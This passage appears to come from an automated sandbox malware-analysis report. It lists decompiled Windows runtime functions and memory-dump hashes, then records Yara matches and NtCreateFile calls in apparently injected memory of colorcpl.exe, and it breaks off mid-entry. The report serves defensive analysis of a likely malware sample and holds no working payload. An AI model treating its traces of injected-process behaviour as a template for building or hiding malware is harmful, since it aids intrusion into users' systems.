                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                          • Instruction ID: 8af905395f39d03015f2a2a3c3c32a8b1d72ec3ac6eeec8d3399f7816f2a4f8f
                                                                          • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                          • Instruction Fuzzy Hash: CBC08C32080248BBCB126E41DD00F017B29E7A0B60F000020B6040A9608632EC61D588
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011A36CC, Relevance: .0, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E011A36CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L01194620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}



                                                                          0x011a36d2
                                                                          0x011a36e8
                                                                          0x011a36d4
                                                                          0x011a36e5
                                                                          0x011a36e5

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                          • Instruction ID: 0cc04342d42ddbaa9471e7fde313f59692767e4228b822905f16c72e55e915dd
                                                                          • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                          • Instruction Fuzzy Hash: 63C02BF4160440FBDB1D1F30CE00F147254F700A25FB403547230858F0D7289C00D100
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011876E2, Relevance: .0, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E011876E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}




                                                                          0x011876e4
                                                                          0x00000000
                                                                          0x011876f8
                                                                          0x011876fd

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                          • Instruction ID: 06db9950f50505f715ca0939a8ed181001c32574b56edca5b39e60b5fbbc4ef6
                                                                          • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                          • Instruction Fuzzy Hash: 34C08C701555805AFF2E670CCE24B243A50AF0860CFB8019CEA01094E2C368A802CA08
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01197D50, Relevance: .0, Instructions: 7COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E01197D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}




                                                                          0x01197d56
                                                                          0x01197d5b
                                                                          0x01197d60
                                                                          0x01197d5d
                                                                          0x01197d5d
                                                                          0x01197d5d

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                          • Instruction ID: 3b4f06c8a1761f48e43f596d62b25181a8dc5e5297b9e125a0c8d104b4c85a31
                                                                          • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                          • Instruction Fuzzy Hash: 51B092353119408FCF1ADF18C080B1933E4BB44A40B8400D0E400CBA21D329E8009900
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011A2ACB, Relevance: .0, Instructions: 5COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E011A2ACB() {
				void* _t5;

				return E0118EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}




                                                                          0x011a2adc

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                          • Instruction ID: 98e8727d2fe2a40afb0b0c780a75f1a49a5f6445f0776a066cc97b2d189d4745
                                                                          • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                          • Instruction Fuzzy Hash: 7FB01232C51441CFCF06FF40CA10B197331FB00750F098490900127930C328AC01CF40
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011BAD30, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1233eab8f2d171349f0a4bf89e39d6a2c7dff16f0094e05d65e0764c55ff8647
                                                                          • Instruction ID: e651053862016c4be98acbf79ce136fa7be74ed2f0628a587b01046d7b9bd1c9
                                                                          • Opcode Fuzzy Hash: 1233eab8f2d171349f0a4bf89e39d6a2c7dff16f0094e05d65e0764c55ff8647
                                                                          • Instruction Fuzzy Hash: 00900271A05000129644719959146464006B7F0B81B55C029A0505594CCA948A55A3E5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011B9520, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a783de51d02364ebbdc22880864e10dd0a5e9c2d0041f12d5176eb3ad61bc276
                                                                          • Instruction ID: 446743cab4c0c85417ddeba282b5e36df3e74a8d99790ac81e75f8ad645d02c5
                                                                          • Opcode Fuzzy Hash: a783de51d02364ebbdc22880864e10dd0a5e9c2d0041f12d5176eb3ad61bc276
                                                                          • Instruction Fuzzy Hash: 7E9002F1201140924A04A2999504B0A4505A7F0641B51C02EE10455A0CC6658851E1B9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011B9950, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2ab29e5a9ff5087f78d128b2e99b9798a8438f4e12e397e8a9baa1d9bcb06b82
                                                                          • Instruction ID: 6536132e033ea484a200fe09d24372106d8060a3299c7656274175d378f2f3b4
                                                                          • Opcode Fuzzy Hash: 2ab29e5a9ff5087f78d128b2e99b9798a8438f4e12e397e8a9baa1d9bcb06b82
                                                                          • Instruction Fuzzy Hash: 2C9002B120140403D644659959046070005A7E0742F51C029A2055595ECB698C51B1B9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011B9560, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8fc241af54fa4ec2554076b47f176821728de02fd9e58354994fe7f229d38cf1
                                                                          • Instruction ID: 347c8976c160c5a0111a0ce79ab0ba4114df0280bbc4ee004632fb0680d41b3d
                                                                          • Opcode Fuzzy Hash: 8fc241af54fa4ec2554076b47f176821728de02fd9e58354994fe7f229d38cf1
                                                                          • Instruction Fuzzy Hash: 54900275221000020649A599170450B0445B7E6791391C02DF14075D0CC7618865A3A5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011B99D0, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 936a772bb924d06a05909c63d8699e97da4be21c98812ecd0346d6af6ca66fa8
                                                                          • Instruction ID: 66caaa477de81c22b20903ce9be2e5317812530a925671b7f28fc928e24bdfda
                                                                          • Opcode Fuzzy Hash: 936a772bb924d06a05909c63d8699e97da4be21c98812ecd0346d6af6ca66fa8
                                                                          • Instruction Fuzzy Hash: 5A9002B121100042D608619955047060045A7F1641F51C02AA2145594CC6698C61A1A9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011B95F0, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 94a7bf0abedbde0640513ddf9d30f3a276cd813ee7e8d2405291cc03794d65d9
                                                                          • Instruction ID: 6ea07071036bdd88abdaa51810554e44d7b915c48d8947a953c5f320bafd0dbd
                                                                          • Opcode Fuzzy Hash: 94a7bf0abedbde0640513ddf9d30f3a276cd813ee7e8d2405291cc03794d65d9
                                                                          • Instruction Fuzzy Hash: 9090027120100802D608619959046860005A7E0741F51C029A6015695ED7A58891B1B5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011B9820, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e06a6458fd9c08b81590ef30e62683e9a456679b67ff2a328ed056d9a4eeeb5b
                                                                          • Instruction ID: c6151663af7131bd017701a52bdd0af57bd069b43c22834d3b81a3540969fd78
                                                                          • Opcode Fuzzy Hash: e06a6458fd9c08b81590ef30e62683e9a456679b67ff2a328ed056d9a4eeeb5b
                                                                          • Instruction Fuzzy Hash: 2D90027124100402D645719955046060009B7E0681F91C02AA0415594EC7958A56FAE5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011BB040, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6c261166f383704ca419de982c0abd43dfb913e16bc60901876e34dc70395ec6
                                                                          • Instruction ID: 10f82dd940e134283d90b711d70dc2822909d585e5b247527f45dcc1da479854
                                                                          • Opcode Fuzzy Hash: 6c261166f383704ca419de982c0abd43dfb913e16bc60901876e34dc70395ec6
                                                                          • Instruction Fuzzy Hash: 749002B1601140434A44B19959044065015B7F1741391C139A04455A0CC7A88855E2E9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011B98A0, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b01870869cda013889f9f4762176af85b57f45c67086ca6bf28c39aa9284b959
                                                                          • Instruction ID: cac0917f26f47235b9ae93ac0e914379f7313a75ce035717197611fbf40a22a3
                                                                          • Opcode Fuzzy Hash: b01870869cda013889f9f4762176af85b57f45c67086ca6bf28c39aa9284b959
                                                                          • Instruction Fuzzy Hash: F090027130100402D606619955146060009E7E1785F91C02AE1415595DC7658953F1B6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011BA710, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 37de3a8954893e23e1927019dbe29b88dcd43558d17ba3b5b90189260b15ca40
                                                                          • Instruction ID: 2c3a19a62ee4a4cd457c1b8ff34ac9e36631e9caa0a0b317fb2c5b26aa3d4f6f
                                                                          • Opcode Fuzzy Hash: 37de3a8954893e23e1927019dbe29b88dcd43558d17ba3b5b90189260b15ca40
                                                                          • Instruction Fuzzy Hash: E4900271301000529A04A6D96904A4A4105A7F0741B51D02DA4005594CC6948861A1A5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011B9B00, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e517c4ae757137f355becc132aaa2d41296401552f79ff8b8359eb5f5a7bc362
                                                                          • Instruction ID: 0da31a6d6213931f94a2882e269cd50b53a34d22497efd7d5d61db32067eece2
                                                                          • Opcode Fuzzy Hash: e517c4ae757137f355becc132aaa2d41296401552f79ff8b8359eb5f5a7bc362
                                                                          • Instruction Fuzzy Hash: 1990027124100802D644719995147070006E7E0A41F51C029A0015594DC7568965B6F5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011B9730, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b3c377fd8c8b73e99d9c332495f0dec87478203dafb6a2ba88aea09bae803f5d
                                                                          • Instruction ID: ac326250e83295038fa9594be6d91b8d94353cf9b6cbe0699a35048c4f477d50
                                                                          • Opcode Fuzzy Hash: b3c377fd8c8b73e99d9c332495f0dec87478203dafb6a2ba88aea09bae803f5d
                                                                          • Instruction Fuzzy Hash: B690027160500402D644719965187060015A7E0641F51D029A0015594DC7998A55B6E5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011B9770, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 60f2acb2eb26c0353daadb99774eef9b8287a9e8ab603d40d1405806e921b60d
                                                                          • Instruction ID: ef8fe6e91c1f112b0eb5517cc02da941f15453e77f4880b71e23e0b76bfa67a3
                                                                          • Opcode Fuzzy Hash: 60f2acb2eb26c0353daadb99774eef9b8287a9e8ab603d40d1405806e921b60d
                                                                          • Instruction Fuzzy Hash: DD90027120504442D60465996508A060005A7E0645F51D029A10555D5DC7758851F1B5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011BA770, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9e7b24b0cb3d1ec98bd00cdc66c81da1f4a8490aa1e1b2689fb6971d2e6875ed
                                                                          • Instruction ID: ca6b0432e41f9b7fbf961c144c093f2230693bc4aee0a5a23398a5b2239c2aad
                                                                          • Opcode Fuzzy Hash: 9e7b24b0cb3d1ec98bd00cdc66c81da1f4a8490aa1e1b2689fb6971d2e6875ed
                                                                          • Instruction Fuzzy Hash: 3A90027520504442DA0465996904A870005A7E0745F51D429A04155DCDC7948861F1A5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011B9760, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 607fdbe202babfcd4fb3ebcc148077b718f9c8c2eaafd6dee397b6be4ac4fa37
                                                                          • Instruction ID: 9ad94ee365b958f71295e1d072bb1090d5895adde6b60d20bc84c9943bd0be09
                                                                          • Opcode Fuzzy Hash: 607fdbe202babfcd4fb3ebcc148077b718f9c8c2eaafd6dee397b6be4ac4fa37
                                                                          • Instruction Fuzzy Hash: 3490027120100403D604619966087070005A7E0641F51D429A0415598DD7968851B1A5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011BA3B0, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f14b0db455a6b425835f0719528877186a7106de65ce556631bca561d13828ec
                                                                          • Instruction ID: ecf5eef774992be3ae6d097754fadf18aa42bcd612e038c0e3400d18d989fd97
                                                                          • Opcode Fuzzy Hash: f14b0db455a6b425835f0719528877186a7106de65ce556631bca561d13828ec
                                                                          • Instruction Fuzzy Hash: CE90027120144002D6447199954460B5005B7F0741F51C429E0416594CC7558856E2A5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011B9A10, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 57ba971e2fe0bf0fb4ba90a1b8d3efd41cc278daef23e3789a7cd796b7217e18
                                                                          • Instruction ID: 174c34bf72d86de8ac6b8ef3029d7e72174525d305bd793653884fad9a8b745b
                                                                          • Opcode Fuzzy Hash: 57ba971e2fe0bf0fb4ba90a1b8d3efd41cc278daef23e3789a7cd796b7217e18
                                                                          • Instruction Fuzzy Hash: 4590027120140402D604619959087470005A7E0742F51C029A5155595EC7A5C891B5B5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011B9610, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: fe28f1f831b51bab0cd0e59748c08d8bb00da98c73b4cf5f57da95ee46d0b3c7
                                                                          • Instruction ID: f044949698ec15db453afcd6cd5c0997baef142b6c08ff0c7516204a76289a59
                                                                          • Opcode Fuzzy Hash: fe28f1f831b51bab0cd0e59748c08d8bb00da98c73b4cf5f57da95ee46d0b3c7
                                                                          • Instruction Fuzzy Hash: 4690027160500802D654719955147460005A7E0741F51C029A0015694DC7958A55B6E5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011B9650, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bb7b56bd4d99d629dfa49864531e5b39b7d4109a20ab2716f2f9977596bf44b4
                                                                          • Instruction ID: f6fd1f2cd0580b071a13823c7c49d464078d88a563fc1c45bf86680044532042
                                                                          • Opcode Fuzzy Hash: bb7b56bd4d99d629dfa49864531e5b39b7d4109a20ab2716f2f9977596bf44b4
                                                                          • Instruction Fuzzy Hash: 3590027120504842D64471995504A460015A7E0745F51C029A00556D4DD7658D55F6E5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011B9A80, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6e156d67d070525591e8f672f1cadf4d21f743feb60ebaffb60b4f23586ec1fc
                                                                          • Instruction ID: 7bade3cb565709800afecc097e3b15883334ae9b309a20c54766822762e04dae
                                                                          • Opcode Fuzzy Hash: 6e156d67d070525591e8f672f1cadf4d21f743feb60ebaffb60b4f23586ec1fc
                                                                          • Instruction Fuzzy Hash: F590027120144442D64462995904B0F4105A7F1642F91C02DA4147594CCA558855A7A5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011B96D0, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 97a9e73ab3c80ab48ce96000a8d8441d29ae6c13571fbcd56deb46bf9a239ad8
                                                                          • Instruction ID: f98da3f6b9a9028adb90d2e70cd675b216ce34a40e342861e5f5ced6c882e912
                                                                          • Opcode Fuzzy Hash: 97a9e73ab3c80ab48ce96000a8d8441d29ae6c13571fbcd56deb46bf9a239ad8
                                                                          • Instruction Fuzzy Hash: A390027120100842D60461995504B460005A7F0741F51C02EA0115694DC755C851B5A5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011B9670, Relevance: .0, Instructions: 2COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                          • Instruction ID: 30c385f3693939e84948d6378047d309a20fe46e3c6dba52cb6ea41f1368894e
                                                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                          • Instruction Fuzzy Hash:
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0120FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 53%
                                                                          			E0120FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E011BCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E01205720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E01205720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                          0x0120fdda
                                                                          0x0120fde2
                                                                          0x0120fde5
                                                                          0x0120fdec
                                                                          0x0120fdfa
                                                                          0x0120fdff
                                                                          0x0120fe0a
                                                                          0x0120fe0f
                                                                          0x0120fe17
                                                                          0x0120fe1e
                                                                          0x0120fe19
                                                                          0x0120fe19
                                                                          0x0120fe19
                                                                          0x0120fe20
                                                                          0x0120fe21
                                                                          0x0120fe22
                                                                          0x0120fe25
                                                                          0x0120fe40

                                                                          APIs
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0120FDFA
                                                                          Strings
                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0120FE01
                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0120FE2B
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                          • API String ID: 885266447-3903918235
                                                                          • Opcode ID: a35159f5c7a849a8308227fd881c6565271988186638ca0006ecf7d825e1c10f
                                                                          • Instruction ID: 6d220573def547e5509ab3e0de8ce5462cecc2376a40b548b58fd37bcd116226
                                                                          • Opcode Fuzzy Hash: a35159f5c7a849a8308227fd881c6565271988186638ca0006ecf7d825e1c10f
                                                                          • Instruction Fuzzy Hash: 14F0C232250202BBE7291A45DC06F23BF5AEB44B30F140314F628561E2DA62B83096E0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Analysis Process: colorcpl.exe PID: 5436 Parent PID: 3292 colorcpl.exeCOMMON

                                                                          Executed Functions

                                                                          Function 025B85CB, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42filenativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,025B3BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,025B3BC7,007A002E,00000000,00000060,00000000,00000000), ref: 025B861D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000E.00000002.509955285.00000000025A0000.00000040.00020000.sdmp, Offset: 025A0000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID: .z`
                                                                          • API String ID: 823142352-1441809116
                                                                          • Opcode ID: 4b2e639e32f6fb0c345cf54f438962c7d2677e3d3393cecf9741b245bfa13b4d
                                                                          • Instruction ID: e0743587c548583fa0e450b95260e09e2435410ac9edbfe1e19fc56fdd26a967
                                                                          • Opcode Fuzzy Hash: 4b2e639e32f6fb0c345cf54f438962c7d2677e3d3393cecf9741b245bfa13b4d
                                                                          • Instruction Fuzzy Hash: EE01AFB2201508ABCB58CF98DC95EEB77A9AF8C354F158248FA0DD7241D630E811CBA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 025B85D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,025B3BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,025B3BC7,007A002E,00000000,00000060,00000000,00000000), ref: 025B861D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000E.00000002.509955285.00000000025A0000.00000040.00020000.sdmp, Offset: 025A0000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID: .z`
                                                                          • API String ID: 823142352-1441809116
                                                                          • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                          • Instruction ID: 467570bd2f6d5356bd5e8ed7b5b8ac2e00398562f81552b9094c0828924727e2
                                                                          • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
